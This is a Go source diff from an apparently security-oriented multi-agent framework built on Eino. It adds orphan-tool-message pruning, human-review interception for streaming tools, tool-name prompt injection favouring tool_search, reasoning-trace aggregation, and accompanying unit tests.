if tc.ID == "c_ok" {
|
||||
foundOKAsst = true
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
if !foundOKTool || !foundOKAsst {
|
||||
t.Fatalf("recent tool-round (c_ok) must be retained as an atomic pair: assistantKept=%v toolKept=%v", foundOKAsst, foundOKTool)
|
||||
}
|
||||
}
|
||||
|
||||
func TestSummarizeFinalize_BudgetZeroFallsBackToSummaryOnly(t *testing.T) {
|
||||
sys := schema.SystemMessage("sys")
|
||||
summary := schema.AssistantMessage("summary", nil)
|
||||
msgs := []adk.Message{
|
||||
sys,
|
||||
assistantToolCallsMsg("", "c1"),
|
||||
schema.ToolMessage("r1", "c1"),
|
||||
}
|
||||
out, err := summarizeFinalizeWithRecentAssistantToolTrail(
|
||||
context.Background(),
|
||||
msgs,
|
||||
summary,
|
||||
fixedTokenCounter(1),
|
||||
0,
|
||||
)
|
||||
if err != nil {
|
||||
t.Fatalf("unexpected error: %v", err)
|
||||
}
|
||||
if len(out) != 2 || out[0] != sys || out[1] != summary {
|
||||
t.Fatalf("budget=0 must yield [system, summary] only, got %+v", out)
|
||||
}
|
||||
}
|
||||
|
||||
func TestSummarizeFinalize_PreservesAllSystemMessages(t *testing.T) {
|
||||
sys1 := schema.SystemMessage("sys1")
|
||||
sys2 := schema.SystemMessage("sys2")
|
||||
summary := schema.AssistantMessage("s", nil)
|
||||
msgs := []adk.Message{
|
||||
sys1,
|
||||
schema.UserMessage("q"),
|
||||
sys2, // 非典型位置,但应当被 system group 捕获
|
||||
}
|
||||
out, err := summarizeFinalizeWithRecentAssistantToolTrail(
|
||||
context.Background(),
|
||||
msgs,
|
||||
summary,
|
||||
fixedTokenCounter(1),
|
||||
100,
|
||||
)
|
||||
if err != nil {
|
||||
t.Fatalf("unexpected error: %v", err)
|
||||
}
|
||||
systemCount := 0
|
||||
for _, m := range out {
|
||||
if m != nil && m.Role == schema.System {
|
||||
systemCount++
|
||||
}
|
||||
}
|
||||
if systemCount != 2 {
|
||||
t.Fatalf("want 2 system messages retained, got %d", systemCount)
|
||||
}
|
||||
}
|
||||
|
||||
// assertNoOrphanTool 断言消息列表里的每个 role=tool 消息都能在更前面找到一个
|
||||
// assistant(tool_calls) 提供相同 ID,否则说明产生了孤儿(触发 LLM 400 的根因)。
|
||||
func assertNoOrphanTool(t *testing.T, msgs []adk.Message) {
|
||||
t.Helper()
|
||||
provided := make(map[string]struct{})
|
||||
for _, m := range msgs {
|
||||
if m == nil {
|
||||
continue
|
||||
}
|
||||
if m.Role == schema.Assistant {
|
||||
for _, tc := range m.ToolCalls {
|
||||
if tc.ID != "" {
|
||||
provided[tc.ID] = struct{}{}
|
||||
}
|
||||
}
|
||||
}
|
||||
if m.Role == schema.Tool && m.ToolCallID != "" {
|
||||
if _, ok := provided[m.ToolCallID]; !ok {
|
||||
t.Fatalf("orphan tool message found: ToolCallID=%q has no preceding assistant(tool_calls)", m.ToolCallID)
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
@@ -9,34 +9,43 @@ import (
|
||||
|
||||
// injectToolNamesOnlyInstruction prepends a compact tool-name-only section into
|
||||
// the system instruction so the model can reference current callable names.
|
||||
func injectToolNamesOnlyInstruction(ctx context.Context, instruction string, tools []tool.BaseTool) string {
|
||||
// toolSearchMiddlewareActive must be true when prependEinoMiddlewares mounted toolsearch (dynamic tools); do not infer this
|
||||
// by scanning tool names — tool_search is injected by middleware and is usually absent from the pre-split tools list.
|
||||
func injectToolNamesOnlyInstruction(ctx context.Context, instruction string, tools []tool.BaseTool, toolSearchMiddlewareActive bool) string {
|
||||
names := collectToolNames(ctx, tools)
|
||||
if len(names) == 0 {
|
||||
return strings.TrimSpace(instruction)
|
||||
}
|
||||
hasToolSearch := false
|
||||
for _, n := range names {
|
||||
if strings.EqualFold(strings.TrimSpace(n), "tool_search") {
|
||||
hasToolSearch = true
|
||||
break
|
||||
hasToolSearch := toolSearchMiddlewareActive
|
||||
if !hasToolSearch {
|
||||
for _, n := range names {
|
||||
if strings.EqualFold(strings.TrimSpace(n), "tool_search") {
|
||||
hasToolSearch = true
|
||||
break
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
var sb strings.Builder
|
||||
sb.WriteString("以下是当前会话中可调用的工具名称列表(仅名称,无参数定义):\n")
|
||||
sb.WriteString("以下是当前会话绑定的工具名称索引(仅名称,无参数 JSON Schema)。\n")
|
||||
sb.WriteString("说明:若启用了 tool_search,则列表里可能含「非常驻」工具——它们不一定出现在当前轮次下发给模型的工具定义中;在未看到该工具的完整 schema 前,禁止凭名称臆测参数。\n")
|
||||
for _, name := range names {
|
||||
sb.WriteString("- ")
|
||||
sb.WriteString(name)
|
||||
sb.WriteByte('\n')
|
||||
}
|
||||
sb.WriteString("\n使用规则:\n")
|
||||
sb.WriteString("1) 上述仅为名称列表,不包含参数定义。\n")
|
||||
sb.WriteString("1) 上表仅为名称索引,不含参数定义。禁止猜测参数名、类型、枚举取值或是否必填。\n")
|
||||
if hasToolSearch {
|
||||
sb.WriteString("2) 在调用具体工具前,应先使用 tool_search 查看工具详情与参数要求,再发起调用。\n")
|
||||
sb.WriteString("【强制 / 最高优先级】本会话已启用 tool_search(动态工具池)。凡名称索引里出现、但你在「当前请求所附 tools 定义」中看不到其完整参数 schema 的工具,一律必须先调用 tool_search;为省 token 或赶进度而跳过 tool_search、直接调用业务工具,属于明确禁止的错误流程。\n")
|
||||
sb.WriteString("2) 默认策略:只要对目标工具的参数定义有任何不确定,就先 tool_search;宁可多一次 tool_search,也不要在未见 schema 时盲调业务工具。\n")
|
||||
sb.WriteString("3) 调用顺序:先 tool_search(唯一必填参数 regex_pattern:按工具名匹配的正则,如子串 nuclei 或 ^exact_tool_name$)→ 在后续轮次确认目标工具已出现在 tools 列表且已阅读其 schema → 再发起对该工具的真实调用。\n")
|
||||
sb.WriteString("4) tool_search 的返回仅为匹配到的工具名列表;schema 在解锁后的下一轮才会下发。禁止在 schema 未出现时编造 JSON 参数。\n")
|
||||
sb.WriteString("5) 不要臆造不存在的工具名。\n\n")
|
||||
} else {
|
||||
sb.WriteString("2) 调用具体工具前,请先确认该工具的参数要求;不确定时先澄清再调用。\n")
|
||||
sb.WriteString("2) 调用具体工具前,请先确认该工具的参数要求(以当前请求中的工具定义为准);不确定时先澄清再调用。\n")
|
||||
sb.WriteString("3) 不要臆造不存在的工具名。\n\n")
|
||||
}
|
||||
sb.WriteString("3) 不要臆造不存在的工具名。\n\n")
|
||||
if s := strings.TrimSpace(instruction); s != "" {
|
||||
sb.WriteString(s)
|
||||
}
|
||||
|
||||
@@ -8,6 +8,7 @@ import (
|
||||
|
||||
"github.com/cloudwego/eino/adk"
|
||||
"github.com/cloudwego/eino/compose"
|
||||
"github.com/cloudwego/eino/schema"
|
||||
)
|
||||
|
||||
type hitlInterceptorKey struct{}
|
||||
@@ -41,7 +42,31 @@ func WithHITLToolInterceptor(ctx context.Context, fn HITLToolInterceptor) contex
|
||||
return context.WithValue(ctx, hitlInterceptorKey{}, fn)
|
||||
}
|
||||
|
||||
func hitlToolCallMiddleware() compose.InvokableToolMiddleware {
|
||||
// hitlToolCallMiddleware 同时注册 Invokable 与 Streamable。
|
||||
// Eino filesystem 的 execute 为流式工具(StreamableTool),仅挂 Invokable 时人机协同不会拦截,会直接执行。
|
||||
func hitlToolCallMiddleware() compose.ToolMiddleware {
|
||||
return compose.ToolMiddleware{
|
||||
Invokable: hitlInvokableToolCallMiddleware(),
|
||||
Streamable: hitlStreamableToolCallMiddleware(),
|
||||
}
|
||||
}
|
||||
|
||||
func hitlClearReturnDirectlyIfTransfer(ctx context.Context, toolName string) {
|
||||
if !strings.EqualFold(strings.TrimSpace(toolName), adk.TransferToAgentToolName) {
|
||||
return
|
||||
}
|
||||
_ = compose.ProcessState[*adk.State](ctx, func(_ context.Context, st *adk.State) error {
|
||||
if st == nil {
|
||||
return nil
|
||||
}
|
||||
st.ReturnDirectlyToolCallID = ""
|
||||
st.HasReturnDirectly = false
|
||||
st.ReturnDirectlyEvent = nil
|
||||
return nil
|
||||
})
|
||||
}
|
||||
|
||||
func hitlInvokableToolCallMiddleware() compose.InvokableToolMiddleware {
|
||||
return func(next compose.InvokableToolEndpoint) compose.InvokableToolEndpoint {
|
||||
return func(ctx context.Context, input *compose.ToolInput) (*compose.ToolOutput, error) {
|
||||
if input != nil {
|
||||
@@ -55,17 +80,7 @@ func hitlToolCallMiddleware() compose.InvokableToolMiddleware {
|
||||
// transfer_to_agent 在 Eino 中标记为 returnDirectly:工具成功后 ReAct 子图会直接 END,
|
||||
// 并依赖真实工具内的 SendToolGenAction 触发移交。HITL 拒绝时不会执行真实工具,
|
||||
// 若仍走 returnDirectly 分支,监督者会在无 Transfer 动作的情况下结束,模型不再迭代。
|
||||
if strings.EqualFold(strings.TrimSpace(input.Name), adk.TransferToAgentToolName) {
|
||||
_ = compose.ProcessState[*adk.State](ctx, func(_ context.Context, st *adk.State) error {
|
||||
if st == nil {
|
||||
return nil
|
||||
}
|
||||
st.ReturnDirectlyToolCallID = ""
|
||||
st.HasReturnDirectly = false
|
||||
st.ReturnDirectlyEvent = nil
|
||||
return nil
|
||||
})
|
||||
}
|
||||
hitlClearReturnDirectlyIfTransfer(ctx, input.Name)
|
||||
return &compose.ToolOutput{Result: msg}, nil
|
||||
}
|
||||
return nil, err
|
||||
@@ -79,3 +94,30 @@ func hitlToolCallMiddleware() compose.InvokableToolMiddleware {
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
func hitlStreamableToolCallMiddleware() compose.StreamableToolMiddleware {
|
||||
return func(next compose.StreamableToolEndpoint) compose.StreamableToolEndpoint {
|
||||
return func(ctx context.Context, input *compose.ToolInput) (*compose.StreamToolOutput, error) {
|
||||
if input != nil {
|
||||
if fn, ok := ctx.Value(hitlInterceptorKey{}).(HITLToolInterceptor); ok && fn != nil {
|
||||
edited, err := fn(ctx, input.Name, input.Arguments)
|
||||
if err != nil {
|
||||
if IsHumanRejectError(err) {
|
||||
msg := fmt.Sprintf("[HITL Reject] Tool '%s' was rejected by human reviewer. Reason: %s\nPlease adjust parameters/plan and continue without this call.",
|
||||
input.Name, strings.TrimSpace(err.Error()))
|
||||
hitlClearReturnDirectlyIfTransfer(ctx, input.Name)
|
||||
return &compose.StreamToolOutput{
|
||||
Result: schema.StreamReaderFromArray([]string{msg}),
|
||||
}, nil
|
||||
}
|
||||
return nil, err
|
||||
}
|
||||
if edited != "" {
|
||||
input.Arguments = edited
|
||||
}
|
||||
}
|
||||
}
|
||||
return next(ctx, input)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
@@ -0,0 +1,7 @@
|
||||
package multiagent
|
||||
|
||||
import "errors"
|
||||
|
||||
// ErrInterruptContinue 作为 context.CancelCause 使用:用户选择「中断并继续」且当前无进行中的 MCP 工具时,
|
||||
// 取消当前推理/流式输出,并在同一会话任务内携带用户补充说明自动续跑下一轮(类似 Hermes 式人机回合)。
|
||||
var ErrInterruptContinue = errors.New("agent interrupt: continue with user-supplied context")
|
||||
@@ -0,0 +1,124 @@
|
||||
package multiagent
|
||||
|
||||
import (
|
||||
"context"
|
||||
|
||||
"github.com/cloudwego/eino/adk"
|
||||
"github.com/cloudwego/eino/schema"
|
||||
"go.uber.org/zap"
|
||||
)
|
||||
|
||||
// orphanToolPrunerMiddleware 在每次 ChatModel 调用前剪掉没有对应 assistant(tool_calls) 的孤儿 tool 消息。
|
||||
//
|
||||
// 背景:
|
||||
// - eino 的 summarization 中间件在触发摘要后,默认把所有非 system 消息替换为 1 条 summary 消息;
|
||||
// 本项目通过自定义 Finalize(summarizeFinalizeWithRecentAssistantToolTrail)在 summary 后回填
|
||||
// 最近的 assistant/tool 轨迹。若 Finalize 的保留策略按"条数"截断而未按 round 对齐,可能保留
|
||||
// 了 tool 结果却把对应的 assistant(tool_calls) 落在了 summary 前面,形成孤儿 tool 消息。
|
||||
// - 同样,reduction / tool_search / 自定义断点恢复等任一改写历史的逻辑,都可能破坏
|
||||
// tool_call ↔ tool_result 配对。
|
||||
//
|
||||
// 一旦孤儿 tool 消息进入 ChatModel,OpenAI 兼容 API(含 DashScope / 各类中转)会返回
|
||||
// 400 "No tool call found for function call output with call_id ...",并被 Eino 包装成
|
||||
// [NodeRunError] 抛出,终止整轮编排。
|
||||
//
|
||||
// 设计取舍:
|
||||
// - 官方 patchtoolcalls 中间件只补反向(assistant(tc) 缺 tool_result),不处理孤儿 tool。
|
||||
// 本中间件与之互补,专职兜底正向孤儿。
|
||||
// - 仅剔除消息,不向历史里注入虚构 assistant(tc):虚构 tool_calls 反而会误导模型后续推理。
|
||||
// 摘要已覆盖被裁剪段的语义,丢一条原始 tool 结果对对话连贯性影响最小。
|
||||
// - 位置建议:挂在所有可能改写历史的中间件(summarization / reduction / skill / plantask /
|
||||
// tool_search)之后,靠近 ChatModel 调用的那一端。
|
||||
type orphanToolPrunerMiddleware struct {
|
||||
adk.BaseChatModelAgentMiddleware
|
||||
logger *zap.Logger
|
||||
phase string
|
||||
}
|
||||
|
||||
// newOrphanToolPrunerMiddleware 构造中间件。phase 仅用于日志区分 deep / supervisor /
|
||||
// plan_execute_executor / sub_agent,不影响运行时行为。
|
||||
func newOrphanToolPrunerMiddleware(logger *zap.Logger, phase string) adk.ChatModelAgentMiddleware {
|
||||
return &orphanToolPrunerMiddleware{
|
||||
logger: logger,
|
||||
phase: phase,
|
||||
}
|
||||
}
|
||||
|
||||
// BeforeModelRewriteState 扫描消息列表,收集 assistant.tool_calls 提供的 call_id 集合,
|
||||
// 再剔除掉 ToolCallID 不在该集合中的 role=tool 消息。
|
||||
//
|
||||
// 复杂度:O(N)。当未发现孤儿时不产生任何分配,state 原样返回以便上游快路径。
|
||||
func (m *orphanToolPrunerMiddleware) BeforeModelRewriteState(
|
||||
ctx context.Context,
|
||||
state *adk.ChatModelAgentState,
|
||||
mc *adk.ModelContext,
|
||||
) (context.Context, *adk.ChatModelAgentState, error) {
|
||||
_ = mc
|
||||
if m == nil || state == nil || len(state.Messages) == 0 {
|
||||
return ctx, state, nil
|
||||
}
|
||||
|
||||
// 第一遍:收集所有已提供的 tool_call_id;同时快路径判定是否真的存在孤儿。
|
||||
provided := make(map[string]struct{}, 8)
|
||||
for _, msg := range state.Messages {
|
||||
if msg == nil {
|
||||
continue
|
||||
}
|
||||
if msg.Role == schema.Assistant {
|
||||
for _, tc := range msg.ToolCalls {
|
||||
if tc.ID != "" {
|
||||
provided[tc.ID] = struct{}{}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
hasOrphan := false
|
||||
for _, msg := range state.Messages {
|
||||
if msg == nil {
|
||||
continue
|
||||
}
|
||||
if msg.Role == schema.Tool && msg.ToolCallID != "" {
|
||||
if _, ok := provided[msg.ToolCallID]; !ok {
|
||||
hasOrphan = true
|
||||
break
|
||||
}
|
||||
}
|
||||
}
|
||||
if !hasOrphan {
|
||||
return ctx, state, nil
|
||||
}
|
||||
|
||||
// 第二遍:生成剪除孤儿后的新消息列表。
|
||||
pruned := make([]adk.Message, 0, len(state.Messages))
|
||||
droppedIDs := make([]string, 0, 2)
|
||||
droppedNames := make([]string, 0, 2)
|
||||
for _, msg := range state.Messages {
|
||||
if msg == nil {
|
||||
continue
|
||||
}
|
||||
if msg.Role == schema.Tool && msg.ToolCallID != "" {
|
||||
if _, ok := provided[msg.ToolCallID]; !ok {
|
||||
droppedIDs = append(droppedIDs, msg.ToolCallID)
|
||||
droppedNames = append(droppedNames, msg.ToolName)
|
||||
continue
|
||||
}
|
||||
}
|
||||
pruned = append(pruned, msg)
|
||||
}
|
||||
|
||||
if m.logger != nil {
|
||||
m.logger.Warn("eino orphan tool messages pruned before model call",
|
||||
zap.String("phase", m.phase),
|
||||
zap.Int("dropped_count", len(droppedIDs)),
|
||||
zap.Strings("dropped_tool_call_ids", droppedIDs),
|
||||
zap.Strings("dropped_tool_names", droppedNames),
|
||||
zap.Int("messages_before", len(state.Messages)),
|
||||
zap.Int("messages_after", len(pruned)),
|
||||
)
|
||||
}
|
||||
|
||||
ns := *state
|
||||
ns.Messages = pruned
|
||||
return ctx, &ns, nil
|
||||
}
|
||||
@@ -0,0 +1,131 @@
|
||||
package multiagent
|
||||
|
||||
import (
|
||||
"context"
|
||||
"testing"
|
||||
|
||||
"github.com/cloudwego/eino/adk"
|
||||
"github.com/cloudwego/eino/schema"
|
||||
)
|
||||
|
||||
func assistantToolCallsMsg(content string, callIDs ...string) *schema.Message {
|
||||
tcs := make([]schema.ToolCall, 0, len(callIDs))
|
||||
for _, id := range callIDs {
|
||||
tcs = append(tcs, schema.ToolCall{
|
||||
ID: id,
|
||||
Type: "function",
|
||||
Function: schema.FunctionCall{
|
||||
Name: "stub_tool",
|
||||
Arguments: `{}`,
|
||||
},
|
||||
})
|
||||
}
|
||||
return schema.AssistantMessage(content, tcs)
|
||||
}
|
||||
|
||||
func TestOrphanToolPruner_NoOpWhenPaired(t *testing.T) {
|
||||
mw := newOrphanToolPrunerMiddleware(nil, "test").(*orphanToolPrunerMiddleware)
|
||||
|
||||
msgs := []adk.Message{
|
||||
schema.SystemMessage("sys"),
|
||||
schema.UserMessage("hi"),
|
||||
assistantToolCallsMsg("", "c1", "c2"),
|
||||
schema.ToolMessage("r1", "c1"),
|
||||
schema.ToolMessage("r2", "c2"),
|
||||
schema.AssistantMessage("done", nil),
|
||||
}
|
||||
in := &adk.ChatModelAgentState{Messages: msgs}
|
||||
|
||||
_, out, err := mw.BeforeModelRewriteState(context.Background(), in, &adk.ModelContext{})
|
||||
if err != nil {
|
||||
t.Fatalf("unexpected error: %v", err)
|
||||
}
|
||||
if out == nil {
|
||||
t.Fatal("expected non-nil state")
|
||||
}
|
||||
if len(out.Messages) != len(msgs) {
|
||||
t.Fatalf("expected %d messages kept, got %d", len(msgs), len(out.Messages))
|
||||
}
|
||||
// 快路径:未发现孤儿时必须原地返回 state,不分配新切片。
|
||||
if &out.Messages[0] != &msgs[0] {
|
||||
t.Fatalf("expected state to be returned as-is (same backing slice) when no orphan present")
|
||||
}
|
||||
}
|
||||
|
||||
func TestOrphanToolPruner_DropsOrphanToolMessages(t *testing.T) {
|
||||
mw := newOrphanToolPrunerMiddleware(nil, "test").(*orphanToolPrunerMiddleware)
|
||||
|
||||
msgs := []adk.Message{
|
||||
schema.SystemMessage("sys"),
|
||||
// 摘要前的 assistant(tc: c_old) 已被裁剪,但对应的 tool 结果漏保留了。
|
||||
schema.ToolMessage("orphan result", "c_old"),
|
||||
schema.UserMessage("continue"),
|
||||
assistantToolCallsMsg("", "c_new"),
|
||||
schema.ToolMessage("r_new", "c_new"),
|
||||
}
|
||||
in := &adk.ChatModelAgentState{Messages: msgs}
|
||||
|
||||
_, out, err := mw.BeforeModelRewriteState(context.Background(), in, &adk.ModelContext{})
|
||||
if err != nil {
|
||||
t.Fatalf("unexpected error: %v", err)
|
||||
}
|
||||
if out == nil {
|
||||
t.Fatal("expected non-nil state")
|
||||
}
|
||||
if len(out.Messages) != len(msgs)-1 {
|
||||
t.Fatalf("expected %d messages after pruning, got %d", len(msgs)-1, len(out.Messages))
|
||||
}
|
||||
for _, m := range out.Messages {
|
||||
if m != nil && m.Role == schema.Tool && m.ToolCallID == "c_old" {
|
||||
t.Fatalf("orphan tool message with ToolCallID=c_old should have been dropped")
|
||||
}
|
||||
}
|
||||
// 合法的 tool(c_new) 必须保留。
|
||||
foundNew := false
|
||||
for _, m := range out.Messages {
|
||||
if m != nil && m.Role == schema.Tool && m.ToolCallID == "c_new" {
|
||||
foundNew = true
|
||||
break
|
||||
}
|
||||
}
|
||||
if !foundNew {
|
||||
t.Fatal("paired tool message (c_new) must be retained")
|
||||
}
|
||||
}
|
||||
|
||||
func TestOrphanToolPruner_EmptyToolCallIDIsIgnored(t *testing.T) {
|
||||
// 空 ToolCallID 的 tool 消息在真实场景中极罕见,但不应当被误判为孤儿。
|
||||
// 语义上把它当作"无法校验,保留",避免误删。
|
||||
mw := newOrphanToolPrunerMiddleware(nil, "test").(*orphanToolPrunerMiddleware)
|
||||
|
||||
odd := schema.ToolMessage("no_id", "")
|
||||
msgs := []adk.Message{
|
||||
schema.UserMessage("hi"),
|
||||
odd,
|
||||
schema.AssistantMessage("ok", nil),
|
||||
}
|
||||
in := &adk.ChatModelAgentState{Messages: msgs}
|
||||
|
||||
_, out, err := mw.BeforeModelRewriteState(context.Background(), in, &adk.ModelContext{})
|
||||
if err != nil {
|
||||
t.Fatalf("unexpected error: %v", err)
|
||||
}
|
||||
if len(out.Messages) != len(msgs) {
|
||||
t.Fatalf("empty ToolCallID tool message should be kept, got %d messages", len(out.Messages))
|
||||
}
|
||||
}
|
||||
|
||||
func TestOrphanToolPruner_NilAndEmpty(t *testing.T) {
|
||||
mw := newOrphanToolPrunerMiddleware(nil, "test").(*orphanToolPrunerMiddleware)
|
||||
|
||||
ctx := context.Background()
|
||||
// nil state
|
||||
if _, out, err := mw.BeforeModelRewriteState(ctx, nil, &adk.ModelContext{}); err != nil || out != nil {
|
||||
t.Fatalf("nil state: expected (nil,nil), got (%v,%v)", out, err)
|
||||
}
|
||||
// empty messages
|
||||
empty := &adk.ChatModelAgentState{}
|
||||
if _, out, err := mw.BeforeModelRewriteState(ctx, empty, &adk.ModelContext{}); err != nil || out != empty {
|
||||
t.Fatalf("empty messages: expected same state, got (%v,%v)", out, err)
|
||||
}
|
||||
}
|
||||
@@ -0,0 +1,52 @@
|
||||
package multiagent
|
||||
|
||||
import (
|
||||
"encoding/json"
|
||||
"fmt"
|
||||
"strings"
|
||||
)
|
||||
|
||||
// AggregatedReasoningFromTraceJSON concatenates non-empty assistant `reasoning_content`
|
||||
// fields from last_react-style JSON (slice of message objects) in document order.
|
||||
// Used to persist on the single assistant bubble row for audit and for GetMessages fallback
|
||||
// when the full trace JSON is unavailable. For strict per-message replay, prefer last_react_input.
|
||||
func AggregatedReasoningFromTraceJSON(traceJSON string) string {
|
||||
traceJSON = strings.TrimSpace(traceJSON)
|
||||
if traceJSON == "" {
|
||||
return ""
|
||||
}
|
||||
var arr []map[string]interface{}
|
||||
if err := json.Unmarshal([]byte(traceJSON), &arr); err != nil {
|
||||
return ""
|
||||
}
|
||||
var b strings.Builder
|
||||
for _, m := range arr {
|
||||
role, _ := m["role"].(string)
|
||||
if !strings.EqualFold(strings.TrimSpace(role), "assistant") {
|
||||
continue
|
||||
}
|
||||
rc := reasoningContentFromMessageMap(m)
|
||||
if rc == "" {
|
||||
continue
|
||||
}
|
||||
if b.Len() > 0 {
|
||||
b.WriteByte('\n')
|
||||
}
|
||||
b.WriteString(rc)
|
||||
}
|
||||
return b.String()
|
||||
}
|
||||
|
||||
func reasoningContentFromMessageMap(m map[string]interface{}) string {
|
||||
if m == nil {
|
||||
return ""
|
||||
}
|
||||
switch v := m["reasoning_content"].(type) {
|
||||
case string:
|
||||
return strings.TrimSpace(v)
|
||||
case nil:
|
||||
return ""
|
||||
default:
|
||||
return strings.TrimSpace(fmt.Sprint(v))
|
||||
}
|
||||
}
|
||||
@@ -0,0 +1,20 @@
|
||||
package multiagent
|
||||
|
||||
import "testing"
|
||||
|
||||
func TestAggregatedReasoningFromTraceJSON(t *testing.T) {
|
||||
const j = `[
|
||||
{"role":"user","content":"hi"},
|
||||
{"role":"assistant","content":"c1","reasoning_content":"r1","tool_calls":[{"id":"1","type":"function","function":{"name":"f","arguments":"{}"}}]},
|
||||
{"role":"tool","tool_call_id":"1","content":"out"},
|
||||
{"role":"assistant","content":"c2","reasoning_content":"r2"}
|
||||
]`
|
||||
got := AggregatedReasoningFromTraceJSON(j)
|
||||
want := "r1\nr2"
|
||||
if got != want {
|
||||
t.Fatalf("got %q want %q", got, want)
|
||||
}
|
||||
if AggregatedReasoningFromTraceJSON("") != "" || AggregatedReasoningFromTraceJSON("[]") != "" {
|
||||
t.Fatal("empty expected")
|
||||
}
|
||||
}
|
||||
+125
-105
@@ -17,6 +17,7 @@ import (
|
||||
"cyberstrike-ai/internal/config"
|
||||
"cyberstrike-ai/internal/einomcp"
|
||||
"cyberstrike-ai/internal/openai"
|
||||
"cyberstrike-ai/internal/reasoning"
|
||||
|
||||
einoopenai "github.com/cloudwego/eino-ext/components/model/openai"
|
||||
"github.com/cloudwego/eino/adk"
|
||||
@@ -48,6 +49,7 @@ type toolCallPendingInfo struct {
|
||||
|
||||
// RunDeepAgent 使用 Eino 多代理预置编排执行一轮对话(deep / plan_execute / supervisor;流式事件通过 progress 回调输出)。
|
||||
// orchestrationOverride 非空时优先(如聊天/WebShell 请求体);否则用 multi_agent.orchestration(遗留 yaml);皆空则按 deep。
|
||||
// reasoningClient 来自 ChatRequest.reasoning;可为 nil(机器人/批量等走全局 openai.reasoning)。
|
||||
func RunDeepAgent(
|
||||
ctx context.Context,
|
||||
appCfg *config.Config,
|
||||
@@ -61,6 +63,7 @@ func RunDeepAgent(
|
||||
progress func(eventType, message string, data interface{}),
|
||||
agentsMarkdownDir string,
|
||||
orchestrationOverride string,
|
||||
reasoningClient *reasoning.ClientIntent,
|
||||
) (*RunResult, error) {
|
||||
if appCfg == nil || ma == nil || ag == nil {
|
||||
return nil, fmt.Errorf("multiagent: 配置或 Agent 为空")
|
||||
@@ -110,6 +113,7 @@ func RunDeepAgent(
|
||||
mcpIDs = append(mcpIDs, id)
|
||||
mcpIDsMu.Unlock()
|
||||
}
|
||||
einoExecMonitor := newEinoExecuteMonitorCallback(ag, recorder)
|
||||
|
||||
// 与单代理流式一致:在 response_start / response_delta 的 data 中带当前 mcpExecutionIds,供主聊天绑定复制与展示。
|
||||
snapshotMCPIDs := func() []string {
|
||||
@@ -120,6 +124,7 @@ func RunDeepAgent(
|
||||
return out
|
||||
}
|
||||
|
||||
toolInvokeNotify := einomcp.NewToolInvokeNotifyHolder()
|
||||
mainDefs := ag.ToolsForRole(roleTools)
|
||||
toolOutputChunk := func(toolName, toolCallID, chunk string) {
|
||||
// When toolCallId is missing, frontend ignores tool_result_delta.
|
||||
@@ -137,16 +142,6 @@ func RunDeepAgent(
|
||||
})
|
||||
}
|
||||
|
||||
mainTools, err := einomcp.ToolsFromDefinitions(ag, holder, mainDefs, recorder, toolOutputChunk)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
|
||||
mainToolsForCfg, mainOrchestratorPre, err := prependEinoMiddlewares(ctx, &ma.EinoMiddleware, einoMWMain, mainTools, einoLoc, skillsRoot, conversationID, logger)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
|
||||
httpClient := &http.Client{
|
||||
Timeout: 30 * time.Minute,
|
||||
Transport: &http.Transport{
|
||||
@@ -171,6 +166,7 @@ func RunDeepAgent(
|
||||
Model: appCfg.OpenAI.Model,
|
||||
HTTPClient: httpClient,
|
||||
}
|
||||
reasoning.ApplyToEinoChatModelConfig(baseModelCfg, &appCfg.OpenAI, reasoningClient)
|
||||
|
||||
deepMaxIter := ma.MaxIteration
|
||||
if deepMaxIter <= 0 {
|
||||
@@ -222,12 +218,12 @@ func RunDeepAgent(
|
||||
}
|
||||
|
||||
subDefs := ag.ToolsForRole(roleTools)
|
||||
subTools, err := einomcp.ToolsFromDefinitions(ag, holder, subDefs, recorder, toolOutputChunk)
|
||||
subTools, err := einomcp.ToolsFromDefinitions(ag, holder, subDefs, recorder, toolOutputChunk, toolInvokeNotify, id)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("子代理 %q 工具: %w", id, err)
|
||||
}
|
||||
|
||||
subToolsForCfg, subPre, err := prependEinoMiddlewares(ctx, &ma.EinoMiddleware, einoMWSub, subTools, einoLoc, skillsRoot, conversationID, logger)
|
||||
subToolsForCfg, subPre, subToolSearchActive, err := prependEinoMiddlewares(ctx, &ma.EinoMiddleware, einoMWSub, subTools, einoLoc, skillsRoot, conversationID, logger)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("子代理 %q eino 中间件: %w", id, err)
|
||||
}
|
||||
@@ -248,7 +244,7 @@ func RunDeepAgent(
|
||||
}
|
||||
if einoSkillMW != nil {
|
||||
if einoFSTools && einoLoc != nil {
|
||||
subFs, fsErr := subAgentFilesystemMiddleware(ctx, einoLoc)
|
||||
subFs, fsErr := subAgentFilesystemMiddleware(ctx, einoLoc, toolInvokeNotify, id, einoExecMonitor, agentToolTimeoutMinutes(appCfg), toolOutputChunk)
|
||||
if fsErr != nil {
|
||||
return nil, fmt.Errorf("子代理 %q filesystem 中间件: %w", id, fsErr)
|
||||
}
|
||||
@@ -257,27 +253,23 @@ func RunDeepAgent(
|
||||
subHandlers = append(subHandlers, einoSkillMW)
|
||||
}
|
||||
subHandlers = append(subHandlers, subSumMw)
|
||||
// 孤儿 tool 消息兜底:放在 summarization 之后,telemetry 之前,
|
||||
// 以便 telemetry 记录的 token 数与 LLM 实际入参一致。
|
||||
subHandlers = append(subHandlers, newOrphanToolPrunerMiddleware(logger, "sub_agent:"+id))
|
||||
if teleMw := newEinoModelInputTelemetryMiddleware(logger, appCfg.OpenAI.Model, conversationID, "sub_agent"); teleMw != nil {
|
||||
subHandlers = append(subHandlers, teleMw)
|
||||
}
|
||||
|
||||
subInstrFinal := injectToolNamesOnlyInstruction(ctx, instr, subTools)
|
||||
subInstrFinal := injectToolNamesOnlyInstruction(ctx, instr, subTools, subToolSearchActive)
|
||||
if logger != nil {
|
||||
subNames := collectToolNames(ctx, subTools)
|
||||
mountedNames := collectToolNames(ctx, subToolsForCfg)
|
||||
hasToolSearch := false
|
||||
for _, n := range subNames {
|
||||
if strings.EqualFold(strings.TrimSpace(n), "tool_search") {
|
||||
hasToolSearch = true
|
||||
break
|
||||
}
|
||||
}
|
||||
logger.Info("eino tool-name injection",
|
||||
